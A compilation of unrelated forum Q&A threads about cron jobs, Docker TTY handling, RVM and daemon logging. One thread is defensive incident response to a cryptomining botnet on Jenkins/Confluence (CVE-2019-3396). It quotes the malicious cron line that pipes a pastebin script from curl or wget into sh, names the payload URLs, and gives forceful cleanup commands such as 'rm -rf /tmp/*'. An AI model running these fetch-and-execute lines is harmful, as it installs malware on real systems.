So I have a mariadb in a container in /home/admin/containers/mariadb.
This directory also contains an .env-file with MARIADB_ROOT_PASSWORD specified.
I want to backup the database using the following command:
* * * * * root docker exec --env-file /home/admin/containers/mariadb/.env mariadb sh -c 'exec mysqldump --databases dbname -uroot -p"$MARIADB_ROOT_PASSWORD"' > /home/admin/containers/mariadb/backups/dbname.sql
The command works when running from the terminal but crontab only creates an empty sql file.
I assume there are some issues with cron ready the .env file.
Bash command line is nice.
Cron is "different".
Let me count the ways.
Here are things to pay attention to.
To simplify the description,
let's assume you put the above instructions
into backup.sh, so the crontab line is simply
* * * * * root sh backup.sh
Cron is running under UID zero here. Test interactively with: $ sudo backup.sh
Cron uses a restricted $PATH. Test with: $ env PATH=/usr/bin:/bin backup.sh
Cron's $CWD won't be your home directory.
More generally, env will report different results from interactive. Your login dot files have not all been sourced.
Cron doesn't necessarily set umask to 0022. Likely not an issue here.
Output of ulimit -a might differ from what you see interactively.
Cron does not provide a pty, which can affect e.g. password prompts. Likely not an issue here.
Likely there are other details that differ.
If you find that some aspect of the
environment is crucial to a successful
run, then arrange for that near the
top of backup.sh. You might want
to adjust PATH, source a file,
or cd somewhere.
Now let's examine what diagnostic clues
you're gathering from each cron run.
The most important detail is that
while you're logging stdout,
you are regrettably discarding messages sent to
FD 2, stderr.
You can accomplish your logging
on the crontab command line,
or within the backup.sh script.
Use 2>&1 to merge stderr with stdout.
Or capture each stream separately:
docker ... 2> errors.txt > dbname.sql
With no errors, you will see a zero-byte
text file.
Also, remember the default behavior of crond.
If you just run a command, with no
redirect, cron assumes it should
complete silently with zero exit status,
such as /usr/bin/true does.
If there's a non-zero status, cron will
report the error.
If there's any stdout text,
such as /usr/bin/date produces,
cron wants to email you that text.
If there's any stderr text,
again it should be emailed to you.
Test your email setup.
Set the cron MAILTO=me#some.where
variable if the default of root
wasn't suitable.
Interactively verify that email sending on
that server actually works.
Repair your setup for postfix or
whatever if you find that emails are
not reliably being delivered.
Related
So the picture above shows a command khugepageds that is using 98 to 100 % of CPU at times.
I tried finding how does jenkins use this command or what to do about it but was not successful.
I did the following
pkill jenkins
service jenkins stop
service jenkins start
When i pkill ofcourse the usage goes down but once restart its back up again.
Anyone had this issue before?
So, we just had this happen to us. As per the other answers, and some digging of our own, we were able to kill to process (and keep it killed) by running the following command...
rm -rf /tmp/*; crontab -r -u jenkins; kill -9 PID_OF_khugepageds; crontab -r -u jenkins; rm -rf /tmp/*; reboot -h now;
Make sure to replace PID_OF_khugepageds with the PID on your machine. It will also clear the crontab entry. Run this all as one command so that the process won't resurrect itself. The machine will reboot per the last command.
NOTE: While the command above should kill the process, you will probably want to roll/regenerate your SSH keys (on the Jenkins machine, BitBucket/GitHub etc., and any other machines that Jenkins had access to) and perhaps even spin up a new Jenkins instance (if you have that option).
Yes, we were also hit by this vulnerability, thanks to pittss's we were able to detect a bit more about that.
You should check the /var/logs/syslogs for the curl pastebin script which seems to start a corn process on the system, it will try to again escalated access to /tmp folder and install unwanted packages/script.
You should remove everything from the /tmp folder, stop jenkins, check cron process and remove the ones that seem suspicious, restart the VM.
Since the above vulnerability adds unwanted executable at /tmp foler and it tries to access the VM via ssh.
This vulnerability also added a cron process on your system beware to remove that as well.
Also check the ~/.ssh folder for known_hosts and authorized_keys for any suspicious ssh public keys. The attacker can add their ssh keys to get access to your system.
Hope this helps.
This is a Confluence vulnerability https://nvd.nist.gov/vuln/detail/CVE-2019-3396 published on 25 Mar 2019. It allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
Possible solution
Do not run Confluence as root!
Stop botnet agent: kill -9 $(cat /tmp/.X11unix); killall -9 khugepageds
Stop Confluence: <confluence_home>/app/bin/stop-confluence.sh
Remove broken crontab: crontab -u <confluence_user> -r
Plug the hole by blocking access to vulnerable path /rest/tinymce/1/macro/preview in frontend server; for nginx it is something like this:
location /rest/tinymce/1/macro/preview {
return 403;
}
Restart Confluence.
The exploit
Contains two parts: shell script from https://pastebin.com/raw/xmxHzu5P and x86_64 Linux binary from http://sowcar.com/t6/696/1554470365x2890174166.jpg
The script first kills all other known trojan/viruses/botnet agents, downloads and spawns the binary from /tmp/kerberods and iterates through /root/.ssh/known_hosts trying to spread itself to nearby machines.
The binary of size 3395072 and date Apr 5 16:19 is packed with the LSD executable packer (http://lsd.dg.com). I haven't still examined what it does. Looks like a botnet controller.
it seem like vulnerability. try look syslog (/var/log/syslog, not jenkinks log) about like this: CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh).
If that, try stop jenkins, clear /tmp dir and kill all pids started with jenkins user.
After if cpu usage down, try update to last tls version of jenkins. Next after start jenkins update all plugins in jenkins.
A solution that works, because the cron file just gets recreated is to empty jenkins' cronfile, I also changed the ownership, and also made the file immutable.
This finally stopped this process from kicking in..
In my case this was making builds fail randomly with the following error:
Maven JVM terminated unexpectedly with exit code 137
It took me a while to pay due attention to the Khugepageds process, since every place I read about this error the given solution was to increase memory.
Problem was solved with #HeffZilla solution.
I am unable to run repo non-interactively inside a container as part of a freestyle job.
It prompts for the user-name and email. I got round that by doing a git config --global inside the job.
But then it does the color test, and that hangs indefinitely.
Looking at the source code for repo I see this
if os.isatty(0) and os.isatty(1) and not self.manifest.IsMirror:
if opt.config_name or self._ShouldConfigureUser():
self._ConfigureUser()
self._ConfigureColor()
So, I ran the following inside the container:
python -C "import os; print os.isatty(0), os.isatty(1)"
and, sure enough, it printed out True True
Looking at the Jenkins log, it launches the container with --tty specified, and there seems no way to configure that option.
I can't find a bash option to force a script to be run in a non-interactive shell. If I put the above python line in a file and execute it with almost any combination of commands and options, it still prints out True True
The only way I see something different is if I use I/O redirection
bash <a.sh
which prints out False True - i.e. stdin is not a tty, and
bash <a.sh >a.log
which prints False False.
For a complex script, are there any problems using the bash <script approach?
Does anyone know any jenkins magic to prevent docker being launched using --tty?
I know that the --tty is the culprit. I built the container locally and ran the following
$ docker run repotest python -c "import os;print os.isatty(0), os.isatty(1)"
False False
$ docker run --tty repotest python -c "import os;print os.isatty(0), os.isatty(1)"
True True
Running Versions:
repo: 1.12.37 (per Ubuntu 16.04 apt-get)
Jenkins: 2.149
Cloudbees Docker Plugin: 1.7.3
Container base is ubuntu:xenial
I'm using the "Build inside a docker container" option.
To run bash script repo_script.sh "non-interactively", or more exactly speaking without having terminals associated with standard streams, you could run your script simply as
repo_script.sh < /dev/null 2>&1 | cat
assuming you want to see the output the way you would see it running simply as repo_script.sh. By piping the standard output and error to a different process the file descriptor appears as a pipe and not TTY to repo_script.sh. You could also direct output to a file, or even to /dev/null if you do not care about the output:
log_file=/dev/null
repo_script.sh < /dev/null > "${log_file}" 2>&1
Running the script as
bash < repo_script.sh | cat
might would work too, though it is very unorthodox and to my mind hackish way of running a script just to break the association of TTY to the standard input. From script engine point of view, it is different to read a script program from a file than from standard input (which typically, if it is a terminal, is not seekable), so there might be some subtle differences that could possibly bite you in unexpected ways. This way does not as clearly communicate your intention to the next person that need to understand your code, and may lead to partial hair loss in that person due to extraneous head scratching.
There is no need for any bash options, just using the output directions from within the interpreting shell as above described is an easy-to-comprehend, multi-platform compatible standard convention for changing the standard stream associations.
P.S. I think it should be enough for your repo script to just test if the standard input is a TTY. It looks to me like the author of that script did not think deeply enough there. There is simply no use waiting for input if you do not have terminal device associated with standard input, and you could determine that everything needs to run without user interaction from there or stop with an error if that is not possible.
I'm having a rough time executing script/runner with a cron and RVM. I believe the issues lie with the rvm environment not being set before the runner is executed.
currently im throwing the error
/bin/sh: 1.sql: command not found
which is more than i've gotten earlier, so i guess that's good.
I've read this thread Need to set up rvm environment prior to every cron job but im still not really getting it. Part of the problem i think is the error reporting.
this is my runner thus far.
*/1 * * * * * /bin/bash -l -c 'rvm use 1.8.7-p352#2310; cd development/app/my_app2310 && script/runner -e development "Mailer.find_customer"'
as per the above link, i tried making a rvm_cron_runner.
i created a file and placed this in it:
#!/bin/sh
source "/Users/dude/.rvm/scripts/rvm"
exec $1
then i updated my crontab to this.
*/1 * * * * * /bin/bash -l -c '/Users/dude/development/app/my_app2310/rvm_cron_runner; rvm use 1.8.7-p352#2310; cd development/app/my_app2310 && script/runner -e development "Mailer.find_customer"'
This also has made no difference. i get no error. nothing.
Can anyone see what i'm doing incorrectly?
P.S i hope my code formatting worked.
Could you try to place the code you want to run in a separate script, and then use the rvm_cron_runner ?
So place your actions in a file called /path/cron_job
rvm use 1.8.7-p352#2310
cd development/app/my_app2310 && script/runner -e development "Mailer.find_customer"
and then in your crontab write
1 2 * * * /path/rvm_cron_runner /path/cron_job
The differences:
this does not start a separate shell
use the parameter of the rvm_cron_runner
If you would use an .rvmrc file, you could even drop the rvm use ... line, I think.
You don't need to write a second cron runner (following that logic, you might as well write a third cron runner runner). Please keep things simple. All you need to do is configure your cron job to launch a bash shell, and make that bash shell load your environment.
The shebang line in your script should not refer directly to a ruby executable, but to rvm's ruby:
#!/usr/bin/env ruby
This instructs the script to load the environment and run ruby as we would on the command line with rvm loaded.
On many UNIX derived systems, crontabs can have a configuration section before the actual lines that define the jobs to be run. If this is the case, you would then specify:
SHELL=/path/to/bash
This will ensure that the cron job will be spawned from bash. Still, your environment is missing, so to instruct bash to load your environment, you will want to add to the configuration section the following:
BASH_ENV=/path/to/environment (typically .bash_profile or .bashrc)
HOME is automatically derived from the /etc/passwd line of the crontab owner, but you can override it.
HOME=/path/to/home
After this, a cron job might look like this:
15 14 1 * * $HOME/rvm_script.rb
What if your crontab doesn't support the configuration section. Well, you will have to give all the environment directives in one line, with the job itself. For example,
15 14 1 * * export BASH_ENV=/path/to/environment && /full/path/to/bash -c '/full/path/to/rvm_script.rb'
Full blog post on the subject
You can use rvm wrappers:
/home/deploy/.rvm/wrappers/ruby-2.2.4/ruby
Source: https://rvm.io/deployment/cron#direct
I'm having a weird issue with a start-up script which runs a Sinatra script using the shell's "daemon" function. The problem is that when I run the command at the command line, I get output to STDOUT. If I run the command at the command line exactly as it is in the script -- less the daemon part -- the output is correctly redirected to the output file. However, when the startup script runs it (see below), I get stuff to the STDERR log but not to the STDOUT log.
The relevant lines of the script:
#!/bin/sh
# (which is and has been a symlink to /bin/bash
# Source function library.
. /etc/init.d/functions
# Set Some Variables
RUNAS="joeuser"
PID=/var/run/myapp.pid
LOG="/var/log/myapp/app-out.log"
ERR_LOG="/var/log/myapp/app-err.log"
APPLICATION_COMMAND="RAILS_ENV=production ruby /opt/myapp/lib/daemons/my-sinatra-app.rb -p 8002 2>>${ERR_LOG} >>${LOG} &"
# Snip a bunch. This is the applicable line from the "start" case:
daemon --user $RUNAS --pidfile $PID $APPLICATION_COMMAND &> /dev/null
Now, the funky parts:
The error log is written to correctly via the redirect of STDERR.
If I reverse the order of the >> and the 2>> (I'm grasping at straws, here!), the behavior does not change: I still get STDERR logged correctly and STDOUT is empty.
If the output log doesn't exist, the STDOUT redirect creates the file. But, the file remains 0-length.
This used to work. The log directory is maintained by log-rotate. All of the more-recent 'out' logs are 0-length. The older ones are not. It seems like it stopped working some time in April. The ruby code didn't change at any time near then; neither did the startup script.
We're running three different services in this way. Two of them are ruby daemons (one uses sinatra, one does not) and the other is a background java process. This is occurring for BOTH of the ruby processes but is not happening on the java process. Maybe something changed in Ruby?
FTR, we've got ruby 1.8.5 and RHEL 5.4.
I've done some more probing. The daemon function does a bunch of stuff, but the meat of the matter is that it runs the program using runuser. The command essentially looks like this:
runuser -s /bin/bash - joeuser -c "ulimit -S -c 0 >/dev/null 2>&1 ; RAILS_ENV=production ruby /opt/myapp/lib/daemons/my-sinatra-app.rb -p 8002 '</dev/null' '>>/var/log/myapp/app-out.log' '2>>/var/log/myapp/app-err.log' '&'"
When I run exactly that at the command line (both with and without the single-ticks that got added somewhere along the line), I get the exact same screwy behavior w.r.t. the output log. So, it seems to me that this is an issue of how ruby (?) interacts with runuser?
Too long to put in a comment :-)
change the shebang to add #!/bin/sh -x and verify that everything is expanded according to your expectations. Also, when executing from terminal, your .bashrc file is sourced, when executing from script, it is not; might be something in you're environment that differ. One way to find out is to do env from terminal and from script and diff the output
env > env_terminal
env > env_script
diff env_terminal env_script
Happy hunting...
I have a Rails script that I would like to run daily. I know there are many approaches, and that a cron'd script/runner approach is frowned upon by some, but it seems to meet my needs.
However, my script is not getting executed as scheduled.
My application lives at /data/myapp/current, and the script is in script/myscript.rb. I can run it manually without problem as root with:
/data/myapp/current/script/runner -e production /data/myapp/current/script/myscript.rb
When I do that, the special log file (log/myscript.log) gets logged to as expected:
Tue Mar 03 13:16:00 -0500 2009 Starting to execute script...
...
Tue Mar 03 13:19:08 -0500 2009 Finished executing script in 188.075028 seconds
I have it set to run with cron every morning at 4 am. root's crontab:
$ crontab -l
0 4 * * * /data/myapp/current/script/runner -e production /data/myapp/current/script/myscript.rb
In fact, it looks like it's tried to run as recently as this morning!
$ tail -100 /var/log/cron
...
Mar 2 04:00:01 hostname crond[8894]: (root) CMD (/data/myapp/current/script/runner -e production /data/myapp/current/script/myscript.rb)
...
Mar 3 04:00:01 hostname crond[22398]: (root) CMD (/data/myapp/current/script/runner -e production /data/myapp/current/script/myscript.rb)
...
However, there is no entry in my log file, and the data that it should update has not been getting updated. The log file permissions (as a test) were even set to globally writable:
$ ls -lh
total 19M
...
-rw-rw-rw- 1 myuser apps 7.4K Mar 3 13:19 myscript.log
...
I am running on CentOS 5.
So my questions are...
Where else can I look for information to debug this?
Could this be a SELinux issue? Is there a security context that I could set or change that might resolve this error?
Thank you!
Update
Thank you to Paul and Luke both. It did turn out to be an environment issue, and capturing the stderr to a log file enabled me to find the error.
$ cat cron.log
/usr/bin/env: ruby: No such file or directory
$ head /data/myapp/current/script/runner
#!/usr/bin/env ruby
require File.dirname(__FILE__) + '/../config/boot'
require 'commands/runner'
Adding the specific Ruby executable to the command did the trick:
$ crontab -l
0 4 * * * /usr/local/bin/ruby /data/myapp/current/script/runner -e production /data/myapp/current/script/myscript.rb >> /data/myapp/current/log/cron.log 2>&1
By default cron mails its output to the user who ran it. You could look there.
It's very useful to redirect the output of scripts run by cron so that you can look at the results in a log file instead of some random user's local mail on the server.
Here's how you would redirect stdout and stderr to a log file:
cd /home/deploy/your_app/current; script/runner -e production ./script/my_cron_job.rb >> /home/deploy/your_app/current/log/my_file.log 2>&1
The >> redirect stdout to a file, and and the 2>&1 redirects stderr to stdout so any error messages will be logged as well.
Having done this, you will be able to examine the error messages to see what's really going on.
The usual problem when somebody discovers their script won't run in a cron job when it will run from the command line is that it relies on some piece of the environment that an interactive session has but cron doesn't get. Some frequent candidates are the "PATH" environment, and possibly "HOME".
On Linux, make sure all the config files (/etc/crontab, /etc/crond.{daily,hourly,etc}/* and /etc/cron.d/*) are only writeable to user root and are not symlinks, otherwise they will not even be considered.
To allow non-root and/or symlinks, specify the -p option to the crond daemon.